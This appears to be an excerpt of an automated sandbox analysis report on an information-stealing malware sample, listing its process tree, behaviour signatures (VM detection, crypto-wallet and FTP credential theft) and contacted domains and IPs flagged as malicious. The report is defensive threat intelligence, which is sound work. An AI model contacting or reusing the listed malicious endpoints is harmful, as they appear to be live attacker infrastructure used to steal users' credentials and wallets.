conhost.exe 23->33         started        signatures12 process13 dnsIp14 55 surmisehotte.click 104.21.96.1, 443, 49756, 49757 CLOUDFLARENETUS United States 29->55 57 127.0.0.1 unknown unknown 29->57 79 Query firmware table information (likely to detect VMs) 29->79 81 Found many strings related to Crypto-Wallets (likely being stolen) 29->81 83 Tries to harvest and steal ftp login credentials 29->83 85 2 other signatures 29->85 35 chrome.exe 29->35         started        signatures15 process16 dnsIp17 47 192.168.11.20, 137, 1900, 443 unknown unknown 35->47 49 239.255.255.250, 1900 unknown Reserved 35->49 38 chrome.exe 35->38         started        process18 dnsIp19 51 www.google.com 172.217.15.196, 443, 49761, 49762 GOOGLEUS United States 38->51
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
172.67.223.7
 savecoupons.shop United States
13335 CLOUDFLARENETUS true
104.21.96.1
 surmisehotte.click United States
13335 CLOUDFLARENETUS true
104.21.37.173
 journal.liveview.pw United States
13335 CLOUDFLARENETUS true
172.217.15.196
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.11.20
127.0.0.1

Contacted Domains

Name IP Active
surmisehotte.click 104.21.96.1 true
www.google.com 172.217.15.196 true
journal.liveview.pw 104.21.37.173 true
savecoupons.shop 172.67.223.7 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
grannyejh.lat true
    		unknown
    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
      		high
      https://surmisehotte.click/api true
        		unknown